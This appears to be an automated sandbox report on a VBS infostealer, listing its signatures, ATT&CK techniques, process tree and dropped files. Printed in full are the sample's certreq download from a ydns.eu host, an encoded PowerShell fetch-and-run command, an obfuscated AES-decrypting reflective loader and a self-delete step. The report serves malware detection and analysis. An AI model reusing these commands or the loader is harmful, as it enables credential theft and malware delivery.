6351c69330812979b20ca0237dd523081e73bdec6b48c6a1bf8cac708b028ef9

General

Target

91ef79825a38a6d9942f8963206785bc.vbs
Size

784B
MD5

4304fd3c7c6532cb19e0f29773b5e253
SHA1

333be879c7816ebc1417fad26953fc235e2cf2ac
SHA256

0593fa1832103b3903a35bbfab6f0331cb9031b75afeff791cc7d331f5c2a028
SHA512

faed7856e6f9e1933bd1730d1165c75e3dd12288fb7b5d9a3a6a2416efb5a592301aca98ce90562c59045d5f3e81b54c00d1afecc6634af85b330bd3c6ff2031

Score

8^/10

collection spyware stealer

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

13 3480 powershell.exe
Executes dropped EXE 1 IoCs

Processes:

mspalt.bat.exe

pid process

4260 mspalt.bat.exe

flow	pid	process
13	3480	powershell.exe

pid	process
4260	mspalt.bat.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exemspalt.bat.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	mspalt.bat.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

mspalt.bat.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	mspalt.bat.exe
Key opened	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	mspalt.bat.exe
Key opened	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	mspalt.bat.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

powershell.exepowershell.exemspalt.bat.exepowershell.exe

pid	process
3480	powershell.exe
3480	powershell.exe
3380	powershell.exe
3380	powershell.exe
4260	mspalt.bat.exe
4260	mspalt.bat.exe
4260	mspalt.bat.exe
4260	mspalt.bat.exe
3720	powershell.exe
3720	powershell.exe
3720	powershell.exe
3720	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exemspalt.bat.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3480	powershell.exe
Token: SeDebugPrivilege	3380	powershell.exe
Token: SeDebugPrivilege	4260	mspalt.bat.exe
Token: SeDebugPrivilege	3720	powershell.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

WScript.execmd.execmd.execmd.exepowershell.execmd.exemspalt.bat.exe

description	pid	process	target process
PID 4296 wrote to memory of 4468	4296	WScript.exe	cmd.exe
PID 4296 wrote to memory of 4468	4296	WScript.exe	cmd.exe
PID 4468 wrote to memory of 2328	4468	cmd.exe	cmd.exe
PID 4468 wrote to memory of 2328	4468	cmd.exe	cmd.exe
PID 4468 wrote to memory of 804	4468	cmd.exe	cmd.exe
PID 4468 wrote to memory of 804	4468	cmd.exe	cmd.exe
PID 2328 wrote to memory of 452	2328	cmd.exe	certreq.exe
PID 2328 wrote to memory of 452	2328	cmd.exe	certreq.exe
PID 4468 wrote to memory of 1528	4468	cmd.exe	cmd.exe
PID 4468 wrote to memory of 1528	4468	cmd.exe	cmd.exe
PID 1528 wrote to memory of 3480	1528	cmd.exe	powershell.exe
PID 1528 wrote to memory of 3480	1528	cmd.exe	powershell.exe
PID 3480 wrote to memory of 2212	3480	powershell.exe	cmd.exe
PID 3480 wrote to memory of 2212	3480	powershell.exe	cmd.exe
PID 2212 wrote to memory of 3380	2212	cmd.exe	powershell.exe
PID 2212 wrote to memory of 3380	2212	cmd.exe	powershell.exe
PID 2212 wrote to memory of 4260	2212	cmd.exe	mspalt.bat.exe
PID 2212 wrote to memory of 4260	2212	cmd.exe	mspalt.bat.exe
PID 4260 wrote to memory of 3720	4260	mspalt.bat.exe	powershell.exe
PID 4260 wrote to memory of 3720	4260	mspalt.bat.exe	powershell.exe

outlook_office_path 1 IoCs

Processes:

mspalt.bat.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	mspalt.bat.exe

outlook_win_path 1 IoCs

Processes:

mspalt.bat.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	mspalt.bat.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\91ef79825a38a6d9942f8963206785bc.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4296

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" "/c sTARt /B /mIn CeRTReQ.eXe -poSt -CONFIg http://jlhuoiljnuyjbyrtjyghiljoiuhyujhblkjlhnbyugjvytyjgbkjhnyutgyjhyb.ydns.eu/fire/derrffdde.bat c:\WindoWs\wrITE.Exe C:\Users\Admin\AppData\Roaming\MSW0RD.bat | Cmd /stART /b /mIn pING.exe & start C:\Users\Admin\AppData\Roaming\MSW0RD.bat"
2⤵
- Suspicious use of WriteProcessMemory
PID:4468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" sTARt /B /mIn CeRTReQ.eXe -poSt -CONFIg http://jlhuoiljnuyjbyrtjyghiljoiuhyujhblkjlhnbyugjvytyjgbkjhnyutgyjhyb.ydns.eu/fire/derrffdde.bat c:\WindoWs\wrITE.Exe C:\Users\Admin\AppData\Roaming\MSW0RD.bat "
3⤵
- Suspicious use of WriteProcessMemory
PID:2328

C:\Windows\system32\certreq.exe
CeRTReQ.eXe -poSt -CONFIg http://jlhuoiljnuyjbyrtjyghiljoiuhyujhblkjlhnbyugjvytyjgbkjhnyutgyjhyb.ydns.eu/fire/derrffdde.bat c:\WindoWs\wrITE.Exe C:\Users\Admin\AppData\Roaming\MSW0RD.bat
4⤵
PID:452

C:\Windows\system32\cmd.exe
Cmd /stART /b /mIn pING.exe
3⤵
PID:804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Roaming\MSW0RD.bat"
3⤵
- Suspicious use of WriteProcessMemory
PID:1528

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
POWeRsHELl -ex ByPASS -Nop -W 1 -eC IAAJAGkAbgBWAE8ASwBFAC0AVwBlAGIAUgBlAFEAVQBFAFMAVAAgAAkALQBVAFIAaQAgAAkAKAAdIGgAdAB0AHAAOgAdICAACQAgAAkAKwAgAAkAHSAvAC8AagBsAGgAdQBvAGkAbABqAG4AdQB5AGoAYgB5AHIAdABqAHkAZwBoAGkAbABqAG8AaQB1AGgAeQB1AGoAaAAdICAACQAgAAkAKwAgAAkAHSBiAGwAawBqAGwAaABuAGIAeQB1AGcAagB2AHkAdAB5AGoAZwBiAGsAagBoAG4AeQB1AHQAZwB5AGoAaAB5AGIAHSAgAAkAIAAJACsAIAAJAB0gLgB5AGQAbgBzAC4AZQB1AB0gIAAJACAACQArACAACQAdIC8AZgBpAHIAZQAvAHMAYQB2AGUALgBiAGEAdAAdICAACQApACAALQBPAFUAdABGAGkAbABFACAACQAdICQARQBOAFYAOgBUAGUATQBQAFwAbQBzAHAAYQBsAHQALgBiAGEAdAAdICAAOwAgAHMAVABBAFIAVAAgAAkAHSAkAEUATgB2ADoAdABFAE0AcABcAG0AcwBwAGEAbAB0AC4AYgBhAHQAHSA=
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3480

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mspalt.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:2212

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -noprofile -w hidden -ep bypass -c #
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3380

C:\Users\Admin\AppData\Local\Temp\mspalt.bat.exe
"C:\Users\Admin\AppData\Local\Temp\mspalt.bat.exe" -noprofile -ep bypass -c function yR($v){$v.Replace('@', '')}$Kh=yR 'Fro@mBa@se64@St@ri@ng@';$IZ=yR 'Spl@it@';$oS=yR 'R@e@a@dAll@Te@x@t@';$hn=yR 'Entr@yPo@int@';$bU=yR 'Ch@an@g@eEx@ten@s@io@n@';$qi=yR 'I@nv@ok@e@';$qJ=yR 'Get@Cu@r@r@e@ntP@ro@ces@s@';$Xu=yR 'Tra@ns@form@Fi@nal@Bloc@k@';$BY=yR 'C@r@ea@te@D@ecr@ypt@o@r@';$nX=yR 'Loa@d@';function nAwju($EukzE,$KnLgV,$DHvkN){$mNRTM=[System.Security.Cryptography.Aes]::Create();$mNRTM.Mode=[System.Security.Cryptography.CipherMode]::CBC;$mNRTM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$mNRTM.Key=[System.Convert]::$Kh($KnLgV);$mNRTM.IV=[System.Convert]::$Kh($DHvkN);$XIotA=$mNRTM.$BY();$HuHEw=$XIotA.$Xu($EukzE,0,$EukzE.Length);$XIotA.Dispose();$mNRTM.Dispose();$HuHEw;}function GmSLK($EukzE){$ttBgS=New-Object System.IO.MemoryStream(,$EukzE);$bHGBk=New-Object System.IO.MemoryStream;$IttUw=New-Object System.IO.Compression.GZipStream($ttBgS,[IO.Compression.CompressionMode]::Decompress);$IttUw.CopyTo($bHGBk);$IttUw.Dispose();$ttBgS.Dispose();$bHGBk.Dispose();$bHGBk.ToArray();}function Gvvpt($EukzE,$KnLgV){[System.Reflection.Assembly]::$nX([byte[]]$EukzE).$hn.$qi($null,$KnLgV);}$cBaPI=[System.IO.File]::$oS([System.IO.Path]::$bU([System.Diagnostics.Process]::$qJ().MainModule.FileName, $null)).$IZ([Environment]::NewLine);$erUjZ=$cBaPI[$cBaPI.Length-1].Substring(2);$CYaoK=[string[]]$erUjZ.$IZ('\');$aOqoR=GmSLK (nAwju ([Convert]::$Kh($CYaoK[0])) $CYaoK[2] $CYaoK[3]);$YQHYd=GmSLK (nAwju ([Convert]::$Kh($CYaoK[1])) $CYaoK[2] $CYaoK[3]);Gvvpt $YQHYd $null;Gvvpt $aOqoR $null;
6⤵
- Executes dropped EXE
- Checks computer location settings
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:4260

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -c "$a = [System.Diagnostics.Process]::GetProcessById(4260);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;"
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3720

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

2

T1081

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Data from Local System

2

T1005

Email Collection

1

T1114

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
bb925cc5c32a817b61b5a68f00475ac2

SHA1
368bbcd93d46036334f385fe80a6315130a873f4

SHA256
cab89442f228f263a88d3db648093b2389fa2676ee3f95fccdd7c9574a8e1c11

SHA512
69688f4277b0dfdeca560166776ecc74ae2933d6808e849ac60e0eb2310333d37e6216edb23737459a0e2395594a1cd579bccd008499e08526393d96315b4634

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
bae41789df209de6351654d76086f7c2

SHA1
14472787eac8e684154040b0223923e1d38f3d46

SHA256
84fab5955633e7cf846c9682bfdaf209cb5c54b1df029046a9d595b1687895d3

SHA512
7a164666724b2939437d1c2e3ad164928d4c9ccf6c9027621cc7a107f579f6bd685f9588063b0fe17730330c4b517b494c496b2268356e6d4a0c298c86cdcb59

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
b7955fb76a90e0f22cef807d30931389

SHA1
b0baf94728fa95722bb79fd7e808915a34f325c6

SHA256
b5ccfba6cd331784a1245aef10ac4f15f54c8794a3794e98e9999f235c6908a3

SHA512
62411c96d8870fc02cb27d8f8a117e12f6dd0205980a2948594c7a80e377e82098dd98f0a192c101f9ac5cb993b8540f5a785b2978c20218b6a1b8ad5525c936

Download Submit
C:\Users\Admin\AppData\Local\Temp\mspalt.bat
Filesize
121KB

MD5
c61a072f3a23cb30b7de5f2fde721aa5

SHA1
2cf6627b27746800cf433967723cba04437ea8c4

SHA256
3b76cb3ab031658b762892f0d4145498eee84da51d451c67c1ca642afd79add1

SHA512
91362eb4959556c7b9eeb23a407cddbb01b7842ab4e5b583fb61df7182d5e606d174f45a4a90f3791976f70aeff47595357f47a697521388cda924bb986ed3b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\mspalt.bat.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\mspalt.bat.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Roaming\MSW0RD.bat
Filesize
645B

MD5
834e89e3b40dc70d0066308c5aa8086b

SHA1
9938b28483b704b275d6239bf3696d4d68b7ddc0

SHA256
e0821c032569fd1820f3399609b27f448db1b9d34043593661ea6000bbcdf0eb

SHA512
c0562e96e7b8f2fc950ee4a29413c28202eaafd919b52156abc41a4f9489a4f56d797669dc7d58779b051f8bce2ac02c33aca79ba2374ccad2aa8fd643491c95

Download Submit
memory/452-135-0x0000000000000000-mapping.dmp

Download
memory/804-134-0x0000000000000000-mapping.dmp

Download
memory/1528-136-0x0000000000000000-mapping.dmp

Download
memory/2212-141-0x0000000000000000-mapping.dmp

Download
memory/2328-133-0x0000000000000000-mapping.dmp

Download
memory/3380-147-0x00007FF98FD40000-0x00007FF990801000-memory.dmp

Filesize
10.8MB

Download
memory/3380-148-0x00007FF98FD40000-0x00007FF990801000-memory.dmp

Filesize
10.8MB

Download
memory/3380-144-0x0000000000000000-mapping.dmp

Download
memory/3480-139-0x00000242C7650000-0x00000242C7672000-memory.dmp

Filesize
136KB

Download
memory/3480-138-0x0000000000000000-mapping.dmp

Download
memory/3480-140-0x00007FF98FB50000-0x00007FF990611000-memory.dmp

Filesize
10.8MB

Download
memory/3480-143-0x00007FF98FB50000-0x00007FF990611000-memory.dmp

Filesize
10.8MB

Download
memory/3720-162-0x00007FF98FD40000-0x00007FF990801000-memory.dmp

Filesize
10.8MB

Download
memory/3720-159-0x00007FF98FD40000-0x00007FF990801000-memory.dmp

Filesize
10.8MB

Download
memory/3720-156-0x0000000000000000-mapping.dmp

Download
memory/4260-157-0x00007FF9AE8D0000-0x00007FF9AEAC5000-memory.dmp

Filesize
2.0MB

Download
memory/4260-154-0x00007FF9ADC00000-0x00007FF9ADCBE000-memory.dmp

Filesize
760KB

Download
memory/4260-153-0x00007FF9AE8D0000-0x00007FF9AEAC5000-memory.dmp

Filesize
2.0MB

Download
memory/4260-152-0x00007FF98FD40000-0x00007FF990801000-memory.dmp

Filesize
10.8MB

Download
memory/4260-158-0x00007FF9ADC00000-0x00007FF9ADCBE000-memory.dmp

Filesize
760KB

Download
memory/4260-160-0x00007FF98FD40000-0x00007FF990801000-memory.dmp

Filesize
10.8MB

Download
memory/4260-161-0x00007FF9AE8D0000-0x00007FF9AEAC5000-memory.dmp

Filesize
2.0MB

Download
memory/4260-149-0x0000000000000000-mapping.dmp

Download
memory/4468-132-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads